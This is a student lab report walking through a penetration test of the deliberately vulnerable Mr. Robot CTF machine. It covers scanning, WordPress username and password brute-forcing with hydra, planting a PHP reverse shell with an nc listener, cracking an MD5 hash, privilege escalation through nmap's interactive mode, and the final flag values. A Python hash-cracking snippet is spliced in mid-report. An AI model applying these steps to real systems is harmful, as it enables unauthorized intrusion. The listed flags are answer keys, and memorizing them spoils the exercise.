Bangladesh University of Professionals (BUP)
[Link]. in Cyber Security
Course Code: MCS 1101
Course Name: Cyber Security Fundamentals
Lab Assignment No: 05b
Penetration Testing Mr. Robot
Submitted To:
Engr. Md. Mushfiqur Rahman
Guest Faculty, Dept of CE
Bangladesh University of Professionals (BUP)
Dhaka, Bangladesh.

Submitted By:
Sree Pradip Kumer Sarker
ID No: 24525201005
[Link]. in Cyber Security
BUP, Dhaka, Bangladesh.
Penetration Testing Mr. Robot
First, we need to download the Mr. Robot VM so that it can run in our lab environment. It is available from the website below:
[Link]
Next, we import the OVA file of Mr. Robot. Once the machine starts we need to find its IP, and to attack it we need a second machine to work from; I chose the Kali operating system.
From Kali, we use netdiscover to list the hosts on the same network block and locate the Mr. Robot VM.
Here we get two IPs available in this block. Now we scan these IPs with nmap to find the open ports and identify Mr. Robot.
We can also scan in a different way with nmap to be sure about the available target:
# sudo nmap -sC -sV -O [Link] -oN nmap-scan
Where,
● -sC: equivalent to --script=default, i.e. runs Nmap's default script set
● -sV: determines the service/version information of open ports
● -O: enables OS detection
● -oN: writes the scan output in normal format to the file nmap-scan
We can also scan in yet another way:
# nmap -A [Link] -oN nmap-scan-new
● -A: enables OS detection, version detection, script scanning, and traceroute
● -oN: stores the output in the file nmap-scan-new
Of the two available IPs, [Link] is reachable, and all the scans show that 3 ports are detectable, of which 2 are open: 80 and 443.
We can see that it has open ports for an Apache web server, so we can assume this is the Mr. Robot host. We can test this by browsing to the IP address from a web browser.
If we browse to the IP address we see the opening of Mr. Robot, and at the end of its functionality we arrive at this page. To view the source code of the page we can right-click on the page and click "View Page Source".
Now we will search for the directories of this website using gobuster. If gobuster is not installed on our system, we first need to install it.
#apt install gobuster -y
We can also verify that gobuster is installed:
#gobuster -h
To brute-force directories with gobuster we use the command below:
#gobuster dir -u [Link] -w /usr/share/wordlists/dirb/[Link] -o [Link]
• gobuster dir: invokes gobuster in directory mode to search for directories and files.
• -u [Link]: specifies the target URL to scan.
• -w /usr/share/wordlists/dirb/[Link]: uses the wordlist located at /usr/share/wordlists/dirb/[Link] for the scan. This wordlist contains common directory and file names.
• -o [Link]: writes the results of the scan to a file named [Link].
We can also use DirBuster to search the web application's directories with a wordlist; it pops up a GUI that performs the same function.
#dirbuster dir -u [Link] -w /usr/share/wordlists/dirb/[Link] -o [Link]
This shows a lot of results from the application's file directory structure.
We can also search for the application's directories with the dirb tool.
#dirb [Link] -w
To find web-server vulnerabilities we can use the nikto tool. It checks whether the web application has any known web-server vulnerabilities.
Now, to footprint the application, we need to browse all the directories found on the application so that we get a proper footprint of the web application; this lets us find the loopholes that reveal information about the application and expose the mistakes and vulnerabilities of the system.
Let's look at some of the directories and files and what they contain:
#[Link]
Here we found a directory named wp-admin; opening it in the browser gives us the WordPress admin panel login window, which is a big win for a hacker trying to get into the application.
We got that address from the gobuster directory search.
#[Link]
Here is another directory that allows us to download a file; opening it gives very deep and important information about the WordPress installation used here, and other information that can help a hacker attack the application.
#[Link]
Here we can see a blog page and also an image from the application folders.
#[Link]
This is video content from the website.
#[Link]
This provides the license information of WordPress.
#[Link]
From here we get additional information, such as how to install WordPress.
#[Link]
Here we get some file information that helps us track the footprint of the application more deeply.
We got:
#[Link]
This link gives us a .dic file containing a wordlist that may contain the username and password for logging into the admin panel.
#[Link]
This URL holds a number of codes or keys that can be very useful for decoding encryption, or in the fields where they are used, or maybe not.
Here we got the WordPress application's admin panel link and also a file, [Link], which contains lots of words. We are now going to try these words against the login link to find a vulnerability in this site.
First we need to check how many words are in the file [Link].
To do that we first move to the folder where the [Link] file is located.
Let's check first how many words this file contains. To do that we run:
#cat [Link] | wc -l
Here we can see that this file contains 858160 words. We have to sort it to get a unique wordlist that can be used in further actions.
Here we have 11451 unique words in this wordlist. So we create a new wordlist of unique entries in the [Link] file.
Now we need to launch a brute-force attack on the WordPress login page. For an invalid username it returns the specific error "Invalid username". By exploiting this error message an attacker can find a valid username, simply by checking whether the invalid-username message shows up or not.
#hydra -L [Link] -p wedontcare [Link] http-post-form '/wp-[Link]:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
• hydra: the name of the tool.
• -t 64: would set the number of tasks (threads) to run concurrently to 64; the command above uses Hydra's default.
• -L [Link]: the file containing the list of usernames to try; [Link] is the file containing these usernames.
• -p wedontcare: the single password to send with every attempt. Its value does not matter here, since only the username check is of interest.
• [Link]: the target IP address of the WordPress site.
• http-post-form: the attack type, an HTTP POST form.
• '/[Link]:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username': the path to the login form and the format of the POST request. Each part means:
• /[Link]: the path to the WordPress admin login page.
• log=^USER^&pwd=^PASS^&wp-submit=Log+In: the form data sent in the POST request. ^USER^ and ^PASS^ are placeholders that Hydra replaces with each username from [Link] and with the specified password, respectively.
• F=Invalid username: the condition for a failed login attempt. Hydra considers an attempt unsuccessful if it finds the text "Invalid username" in the response.
Here we can see that we got three valid usernames by utilizing the error message for a wrong username and password, which tells us which submitted usernames exist in the database and which do not.
Because submitting a wrong username produces the error message "Invalid username", we took advantage of this and ignored every entry whose output was "Invalid username"; the remaining entries are correct usernames, because when the username is correct the application gives a different error message for a failed login.
Now we will use the error message shown when the password is wrong to find the correct password for one of the usernames we got from the last brute-force attack, which is "elliot".
#hydra -l elliot -P [Link] [Link] http-post-form '/wp-[Link]:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'
For the user "elliot" we got the password "ER28-0652". So the application's authentication has been broken, and we can now log into the WordPress admin pages of the web application.
Now we want to take control of the server machine's shell. To do that we edit a file named "[Link]" with a payload named "[Link]" by pentestmonkey.
Select all, copy the .php payload, paste it into the "[Link]" file and update it.
After updating the file we need to change the attacker's IP address and the port the attacker will listen on with netcat, and update again.
Here the attacker's IP is: [Link]
After updating the file we start listening on the attacker's machine on the port defined here, which is 1234.
#nc -lnvp 1234
Now we browse to "[Link]/[Link]" to call the [Link] file, as it is related to [Link]; this gives us shell access to the "mrrobot" web application server.
To gain a proper terminal we use Python to open the bash executable from the bin folder.
#python3 -c "import pty; [Link]('/bin/bash')"
• python3: invokes the Python 3 interpreter.
• -c: lets you pass a command as a string to the Python interpreter.
• "import pty; [Link]('/bin/bash')": the actual Python command that gets executed.
• import pty: imports the pty module, which provides functions for handling pseudo-terminals.
• [Link]('/bin/bash'): spawns a new pseudo-terminal and runs /bin/bash in it, effectively upgrading the current shell to a fully interactive Bash shell.
We can now explore and gather footprints of the server itself by walking through its folders and files.
While exploring the home folder, where user files are kept, we found a folder named "robot". In that folder we got two files, one named [Link] and another named [Link]-md5.
We could not open the [Link] file because of permission access control.
But we could open the [Link]-md5 file, which contains a hash that may be the password we can use to get root access to this device.
To crack this hash we visit the CrackStation online password hash cracker's website:
[Link]
The crack of the hash we found is "abcdefghijklmnopqrstuvwxyz".
We can also crack the password a different way using hashcat; for that we can download the wordlist from CrackStation.
[Link]
Hashcat is a very strong hash-cracking tool, used together with hash-identifier to figure out which algorithm was used for hashing.
First we need to install hash-identifier to identify which algorithm the hash was produced with. To do that we make sure python and git are installed, then download the git repository of hash-identifier:
#git clone [Link]
Then we go to the directory named hash-identifier and start the tool using python:
#cd hash-identifier
#python3 [Link]
When hash-identifier starts we enter the hash we want to identify, and it reports which algorithm it was hashed with:
The result shows that it was hashed using the MD5 algorithm. We can also check this online at [Link].
The online result also shows it is an MD5 hash, with MD4 as a second answer; as hash-identifier reported MD5, we take that result as the preference.
Now we use hashcat to crack the hash. For each hash type hashcat has a different mode, identified by a number. To find the mode number for MD5 we just run this simple command:
#hashcat -h | grep MD5
Here the mode number for MD5 is 0, which indicates a raw hash.
Now we save the hash into a file for use with hashcat.
#echo 'c3fcd3d76192e4007dfb496cca67e13b' > [Link]
Now we use hashcat to compare the hashed password with a wordlist from our inventory; if the wordlist contains the password, it shows us the cracked password.
#hashcat -m 0 [Link] [Link]
Here hashcat calls the hashcat tool, -m 0 sets the hash type to MD5, and the first [Link] is the file holding the hash we got from footprinting.
The second [Link] is the wordlist; hashcat hashes it with MD5 entry by entry, compares each result with the given hash, and reports the actual password.
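Both identification steps and the hashcat run above come down to two ideas: a 32-character hex digest fits either MD5 or MD4 (which is why the online checker listed both), and an unsalted raw hash can be tested against a wordlist one entry at a time. As an added example (not from the report or from hashcat), the following Python narrows the candidate algorithms by digest length and then performs that dictionary comparison on the hash from the report; the wordlist is constructed here, and candidate algorithms beyond MD5/MD4 are listed for illustration only.

```python
import hashlib

# Hex digest lengths shared by common unsalted algorithms (assumed table for
# illustration). 32 hex chars = 128 bits, which both MD5 and MD4 produce.
CANDIDATES_BY_HEX_LEN = {
    32: ["md5", "md4"],
    40: ["sha1"],
    64: ["sha256"],
    128: ["sha512"],
}

def identify_candidates(hash_hex):
    """Return the algorithms whose digest length matches, or [] if not a hex digest."""
    h = hash_hex.strip().lower()
    if not h or any(c not in "0123456789abcdef" for c in h):
        return []
    return CANDIDATES_BY_HEX_LEN.get(len(h), [])

def dictionary_check(hash_hex, algorithm, wordlist):
    """Hash every candidate word and compare, as hashcat -m 0 does for raw MD5.
    Returns the matching word, or None. Works only because the stored hash is
    unsalted: a per-user salt would force this loop to run per account."""
    target = hash_hex.strip().lower()
    for word in wordlist:
        word = word.rstrip("\n")
        try:
            digest = hashlib.new(algorithm, word.encode()).hexdigest()
        except ValueError:          # e.g. md4 disabled in a restricted OpenSSL build
            return None
        if digest == target:
            return word
    return None

def crack(hash_hex, wordlist):
    """Try each candidate algorithm in turn; return (algorithm, word) or None."""
    for algo in identify_candidates(hash_hex):
        word = dictionary_check(hash_hex, algo, wordlist)
        if word is not None:
            return algo, word
    return None

# Hash copied from the report's .raw-md5 file; the wordlist below is constructed.
ROBOT_HASH = "c3fcd3d76192e4007dfb496cca67e13b"
SAMPLE_WORDLIST = ["password", "elliot", "ER28-0652",
                   "abcdefghijklmnopqrstuvwxyz", "mrrobot"]

if __name__ == "__main__":
    print(crack(ROBOT_HASH, SAMPLE_WORDLIST))  # ('md5', 'abcdefghijklmnopqrstuvwxyz')
```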
Now that we have the password for the robot user, we switch from the daemon user to robot.
#su robot
To go back to the daemon user we can use the Python pty module:
#python3 -c "import pty; [Link]('/bin/bash')"
Now we run nmap --interactive to get Nmap's interactive shell. The --interactive mode is a feature of older versions of Nmap that let users enter an interactive shell within Nmap. It provided a more user-friendly interface for running Nmap commands interactively, similar to a command-line shell.
#nmap --interactive
Now, to run a shell from the robot user, we start a shell from the nmap --interactive prompt using the !sh command:
nmap> !sh
#whoami
#pwd
Now we can also go to the root folder; to do that we run:
#cd /root
#ls
Here we get key number 3.
So these are all the key flags we were able to discover:
key-1-of-3:
073403c8a58a1f80d943455fb30724b9
key-2-of-3:
822c73956184f694993bede3eb39f959
key-3-of-3:
04787ddef27c3dee1ee161b21670b4e4